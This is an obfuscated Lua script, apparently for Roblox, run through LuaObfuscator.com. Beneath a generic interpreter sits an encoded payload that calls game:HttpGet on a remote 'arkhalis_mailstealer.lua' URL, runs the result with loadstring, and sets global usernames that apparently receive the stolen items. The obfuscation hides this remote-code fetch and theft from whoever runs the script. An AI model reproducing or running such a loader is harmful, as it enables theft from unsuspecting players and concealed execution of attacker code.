 --[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v84,v19);v19=nil;v90=1;end end else return v84;end end end);local function v20(v31,v32,v33)if v33 then local v85=0;local v86;while true do if (v85==(0 -(877 -(282 + 595)))) then v86=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-1) -(v32-((2257 -(1523 + 114)) -(555 + 64)))) + (932 -(857 + 74)))) ;return v86-(v86%(569 -(367 + 201))) ;end end else local v87=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and 1) or (0 + 0) ;end end local function v21()local v34=1270 -(226 + 1044) ;local v35;while true do if (v34==(4 -3)) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=1066 -(68 + (1954 -(892 + 65))) ;end end end local function v22()local v36=(0 + 0) -0 ;local v37;local v38;while true do if (v36==(1 -0)) then return (v38 * (469 -213)) + v37 ;end if (v36==(350 -(87 + 263))) then v37,v38=v1(v16,v18,v18 + (182 -(67 + (449 -336))) );v18=v18 + 2 + 0 ;v36=2 -1 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (955 -(802 + 150)) );v18=v18 + 3 + 1 ;return (v42 * (16778213 -(915 + 82))) + (v41 * (185570 -120034)) + (v40 * (689 -(568 -135))) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=1188 -(1069 + 118) ;local v46=(v20(v44,2 -1 ,43 -23 ) * ((1 + 1)^(56 -(99 -75)))) + v43 ;local v47=v20(v44,21 + 0 ,822 -(368 + 423) );local v48=((v20(v44,100 -68 )==(19 -(10 + 8))) and  -(3 -2)) or (443 -(245 + 171 + 26)) ;if (v47==0) then if (v46==0) then return v48 * ((0 -0) -0) ;else v47=(3 -2) + 0 ;v45=0 -0 ;end elseif (v47==(2485 -(145 + 293))) then return ((v46==(430 -((903 -(814 + 45)) + 386))) and (v48 * ((1487 -(998 + 488))/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(838 + 185) ) * (v45 + (v46/((774 -(201 + 571))^(1190 -(116 + 1022))))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v65=1 + 0 , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=1262 -(1091 + 171) ;local v53;local v54;local v55;local v56;local v57;local v58;while true do local v67=0 + 0 ;local v68;while true do if (v67==0) then v68=0 -0 ;while true do if (v68==1) then if (v52==(6 -4)) then local v99=374 -(123 + 251) ;while true do if (v99~=(0 -0)) then else for v105=1,v57 do local v106=0;local v107;local v108;local v109;while true do if (v106~=1) then else v109=nil;while true do if (v107~=(698 -(208 + 490))) then else local v171=0;while true do if (1==v171) then v107=1 + 0 ;break;end if (v171~=(0 + 0)) then else v108=v21();v109=nil;v171=1;end end end if (1~=v107) then else if (v108==(837 -(660 + 176))) then v109=v21()~=0 ;elseif (v108==2) then v109=v24();elseif (v108==(1 + 2)) then v109=v25();end v58[v105]=v109;break;end end break;end if (v106~=0) then else v107=0;v108=nil;v106=1;end end end v56[205 -(14 + 188) ]=v21();v99=676 -(534 + 141) ;end if (v99==1) then for v110=1,v23() do local v111=0;local v112;while true do if ((0 + 0)~=v111) then else v112=v21();if (v20(v112,1 + 0 ,1)==(0 + 0)) then local v161=0 -0 ;local v162;local v163;local v164;local v165;while true do if (1~=v161) then else v164=nil;v165=nil;v161=2;end if (v161~=2) then else while true do if (v162~=(4 -1)) then else if (v20(v164,8 -5 ,2 + 1 )==(1 + 0)) then v165[4]=v58[v165[400 -(115 + 281) ]];end v53[v110]=v165;break;end if ((0 -0)==v162) then local v178=0 + 0 ;while true do if (v178~=1) then else v162=1;break;end if (v178==(0 -0)) then v163=v20(v112,2,3);v164=v20(v112,14 -10 ,873 -(550 + 317) );v178=1 -0 ;end end end if (v162==2) then local v179=0 -0 ;while true do if (v179~=(0 -0)) then else if (v20(v164,286 -(134 + 151) ,1)==1) then v165[2]=v58[v165[1667 -(970 + 695) ]];end if (v20(v164,3 -1 ,1992 -(582 + 1408) )==1) then v165[3]=v58[v165[3]];end v179=1;end if (v179==(3 -2)) then v162=3;break;end end end if (v162==(1 -0)) then local v180=0 -0 ;while true do if (v180==1) then v162=2;break;end if (v180==(1824 -(1195 + 629))) then v165={v22(),v22(),nil,nil};if (v163==(241 -(187 + 54))) then local v187=780 -(162 + 618) ;local v188;while true do if (v187==0) then v188=0;while true do if (v188~=0) then else v165[3]=v22();v165[4]=v22();break;end end break;end end elseif (v163==(1 + 0)) then v165[2 + 1 ]=v23();elseif (v163==(3 -1)) then v165[4 -1 ]=v23() -(2^16) ;elseif (v163==(1 + 2)) then local v193=1636 -(1373 + 263) ;local v194;local v195;while true do if (v193==(1000 -(451 + 549))) then local v196=0;while true do if ((1 + 0)==v196) then v193=1;break;end if (v196==(0 -0)) then v194=0;v195=nil;v196=1;end end end if (1~=v193) then else while true do if (0==v194) then v195=0;while true do if ((0 -0)==v195) then v165[3]=v23() -((1386 -(746 + 638))^16) ;v165[4]=v22();break;end end break;end end break;end end end v180=1;end end end end break;end if (v161==0) then v162=0;v163=nil;v161=1;end end end break;end end end v52=3;break;end end end if (v52==(1 + 0)) then local v100=0;while true do if (v100~=1) then else v58={};v52=2 -0 ;break;end if (v100~=(341 -(218 + 123))) then else v56={v53,v54,nil,v55};v57=v23();v100=1 + 0 ;end end end break;end if (v68==0) then local v98=0;while true do if (v98~=(560 -(306 + 254))) then else if (v52~=(1 + 2)) then else local v102=0 -0 ;while true do if ((1467 -(899 + 568))~=v102) then else local v129=0;while true do if (v129==(0 + 0)) then for v173=1,v23() do v54[v173-1 ]=v28();end return v56;end end end end end if (0~=v52) then else local v103=0 -0 ;local v104;while true do if (v103~=0) then else v104=0;while true do if (v104~=1) then else v55={};v52=604 -(268 + 335) ;break;end if (v104==(290 -(60 + 230))) then v53={};v54={};v104=573 -(426 + 146) ;end end break;end end end v98=1;end if ((1 + 0)~=v98) then else v68=1457 -(282 + 1174) ;break;end end end end break;end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v69=v62;local v70=v63;local v71=v64;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v89=0;while true do if (0==v89) then v81=v69[v73];v82=v81[1];v89=1;end if (v89==1) then if (v82<=10) then if (v82<=4) then if (v82<=1) then if (v82==0) then v79[v81[2]]=v81[3]~=0 ;else local v114=0;local v115;local v116;local v117;local v118;while true do if (2==v114) then for v154=v115,v74 do v118=v118 + 1 ;v79[v154]=v116[v118];end break;end if (1==v114) then v74=(v117 + v115) -1 ;v118=0;v114=2;end if (v114==0) then v115=v81[2];v116,v117=v72(v79[v115](v13(v79,v115 + 1 ,v81[3])));v114=1;end end end elseif (v82<=2) then v79[v81[2]][v81[3]]=v81[4];elseif (v82>3) then v79[v81[2]]=v81[3];else v73=v81[3];end elseif (v82<=7) then if (v82<=5) then do return;end elseif (v82>6) then v79[v81[2]][v81[3]]=v81[4];else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=8) then do return;end elseif (v82==9) then v79[v81[2]]=v81[3];else v79[v81[2]]=v61[v81[3]];end elseif (v82<=15) then if (v82<=12) then if (v82==11) then v79[v81[2]]();else v79[v81[2]]();end elseif (v82<=13) then local v121=0;local v122;local v123;local v124;local v125;while true do if (v121==2) then for v157=v122,v74 do local v158=0;while true do if (v158==0) then v125=v125 + 1 ;v79[v157]=v123[v125];break;end end end break;end if (v121==0) then v122=v81[2];v123,v124=v72(v79[v122](v13(v79,v122 + 1 ,v81[3])));v121=1;end if (1==v121) then v74=(v124 + v122) -1 ;v125=0;v121=2;end end elseif (v82==14) then local v140=v81[2];local v141=v79[v81[3]];v79[v140 + 1 ]=v141;v79[v140]=v141[v81[4]];else local v145=v81[2];v79[v145]=v79[v145](v13(v79,v145 + 1 ,v74));end elseif (v82<=18) then if (v82<=16) then local v126=v81[2];v79[v126]=v79[v126](v13(v79,v126 + 1 ,v74));elseif (v82>17) then local v147=0;local v148;local v149;while true do if (v147==0) then v148=v81[2];v149=v79[v81[3]];v147=1;end if (v147==1) then v79[v148 + 1 ]=v149;v79[v148]=v149[v81[4]];break;end end elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82<=19) then v73=v81[3];elseif (v82==20) then v79[v81[2]]=v61[v81[3]];elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end v73=v73 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B2O033O004E6F6E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403363O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F61726B68616C69735F6D61696C737465616C65722E6C756103093O00557365726E616D653103093O0050696572636550535803093O00557365726E616D653200173O0012043O00013O0026113O000E000100020004133O000E0001001214000100033O003002000100040005001214000100063O001214000200073O00200E000200020008001204000400094O0006000500014O0001000200054O000F00013O00022O000B0001000100010004133O001600010026113O0001000100010004133O00010001001214000100033O0030020001000A000B001214000100033O0030020001000C000B0012043O00023O0004133O000100012O00083O00017O00",v9(),...);end





